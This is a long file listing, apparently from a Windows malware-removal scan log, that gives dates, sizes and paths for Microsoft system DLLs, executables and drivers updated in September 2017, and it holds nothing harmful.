2017-09-14 23:01 - 2017-08-16 16:57 - 003224576 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-09-14 23:01 - 2017-08-16 03:10 - 000395976 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-09-14 23:01 - 2017-08-16 02:25 - 000347336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-09-14 23:01 - 2017-08-15 17:29 - 014182400 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2017-09-14 23:01 - 2017-08-15 17:29 - 001867264 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2017-09-14 23:01 - 2017-08-15 17:10 - 012880896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2017-09-14 23:01 - 2017-08-15 17:10 - 001499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2017-09-14 23:01 - 2017-08-15 16:06 - 015260160 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-09-14 23:01 - 2017-08-15 16:01 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-09-14 23:01 - 2017-08-15 16:01 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-09-14 23:01 - 2017-08-15 16:01 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-09-14 23:01 - 2017-08-15 15:58 - 013673984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 003203584 _____ (Microsoft Corporation) C:\Windows\system32\mmcndmgr.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 002150912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcndmgr.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\mmcbase.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 000303104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcbase.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 000172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cic.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\mmcshext.dll
2017-09-14 23:01 - 2017-08-14 19:35 - 000128512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcshext.dll
2017-09-14 23:01 - 2017-08-14 19:34 - 000211968 _____ (Microsoft Corporation) C:\Windows\system32\cic.dll
2017-09-14 23:01 - 2017-08-13 23:37 - 002144256 _____ (Microsoft Corporation) C:\Windows\system32\mmc.exe
2017-09-14 23:01 - 2017-08-13 23:30 - 001401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
2017-09-14 23:01 - 2017-08-13 20:58 - 025730560 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-09-14 23:01 - 2017-08-13 19:24 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-09-14 23:01 - 2017-08-13 19:24 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-09-14 23:01 - 2017-08-13 19:06 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-09-14 23:01 - 2017-08-13 19:05 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-09-14 23:01 - 2017-08-13 19:05 - 000417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-09-14 23:01 - 2017-08-13 19:05 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-09-14 23:01 - 2017-08-13 19:05 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-09-14 23:01 - 2017-08-13 19:04 - 002899968 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-09-14 23:01 - 2017-08-13 18:56 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-09-14 23:01 - 2017-08-13 18:55 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-09-14 23:01 - 2017-08-13 18:54 - 020269056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-09-14 23:01 - 2017-08-13 18:52 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-09-14 23:01 - 2017-08-13 18:51 - 005981696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-09-14 23:01 - 2017-08-13 18:51 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-09-14 23:01 - 2017-08-13 18:51 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-09-14 23:01 - 2017-08-13 18:50 - 000817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-09-14 23:01 - 2017-08-13 18:50 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-09-14 23:01 - 2017-08-13 18:46 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-09-14 23:01 - 2017-08-13 18:41 - 000968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-09-14 23:01 - 2017-08-13 18:38 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-09-14 23:01 - 2017-08-13 18:30 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-09-14 23:01 - 2017-08-13 18:29 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-09-14 23:01 - 2017-08-13 18:29 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-09-14 23:01 - 2017-08-13 18:29 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-09-14 23:01 - 2017-08-13 18:29 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-09-14 23:01 - 2017-08-13 18:29 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-09-14 23:01 - 2017-08-13 18:28 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-09-14 23:01 - 2017-08-13 18:27 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-09-14 23:01 - 2017-08-13 18:24 - 002291200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-09-14 23:01 - 2017-08-13 18:24 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-09-14 23:01 - 2017-08-13 18:23 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-09-14 23:01 - 2017-08-13 18:22 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-09-14 23:01 - 2017-08-13 18:21 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-09-14 23:01 - 2017-08-13 18:20 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-09-14 23:01 - 2017-08-13 18:19 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-09-14 23:01 - 2017-08-13 18:18 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-09-14 23:01 - 2017-08-13 18:17 - 000663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-09-14 23:01 - 2017-08-13 18:17 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-09-14 23:01 - 2017-08-13 18:17 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-09-14 23:01 - 2017-08-13 18:07 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-09-14 23:01 - 2017-08-13 18:04 - 000807936 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-09-14 23:01 - 2017-08-13 18:04 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-09-14 23:01 - 2017-08-13 18:02 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-09-14 23:01 - 2017-08-13 18:01 - 002134528 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-09-14 23:01 - 2017-08-13 18:01 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-09-14 23:01 - 2017-08-13 18:01 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-09-14 23:01 - 2017-08-13 18:00 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-09-14 23:01 - 2017-08-13 17:57 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-09-14 23:01 - 2017-08-13 17:53 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-09-14 23:01 - 2017-08-13 17:48 - 004547072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-09-14 23:01 - 2017-08-13 17:46 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-09-14 23:01 - 2017-08-13 17:44 - 000694784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-09-14 23:01 - 2017-08-13 17:43 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-09-14 23:01 - 2017-08-13 17:43 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-09-14 23:01 - 2017-08-13 17:40 - 003241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-09-14 23:01 - 2017-08-13 17:27 - 001544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-09-14 23:01 - 2017-08-13 17:18 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-09-14 23:01 - 2017-08-13 17:17 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-09-14 23:01 - 2017-08-13 17:14 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-09-14 23:01 - 2017-08-13 17:13 - 001314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-09-14 23:01 - 2017-08-11 08:42 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-09-14 23:01 - 2017-08-11 08:38 - 005547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-09-14 23:01 - 2017-08-11 08:38 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-09-14 23:01 - 2017-08-11 08:38 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-09-14 23:01 - 2017-08-11 08:38 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-09-14 23:01 - 2017-08-11 08:36 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 002065408 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000757248 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000346112 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000313856 _____ (Microsoft Corporation) C:\Windows\system32\Wldap32.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\nsisvc.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\winnsi.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-09-14 23:01 - 2017-08-11 08:35 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\nsi.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000971776 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000731648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000166400 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:34 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:24 - 004001000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-09-14 23:01 - 2017-08-11 08:24 - 003945704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-09-14 23:01 - 2017-08-11 08:21 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-09-14 23:01 - 2017-08-11 08:20 - 000071680 _____ C:\Windows\system32\PrintBrmUi.exe
2017-09-14 23:01 - 2017-08-11 08:20 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2017-09-14 23:01 - 2017-08-11 08:20 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2017-09-14 23:01 - 2017-08-11 08:19 - 001417728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000554496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000299008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wldap32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000016384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winnsi.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000008704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nsi.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
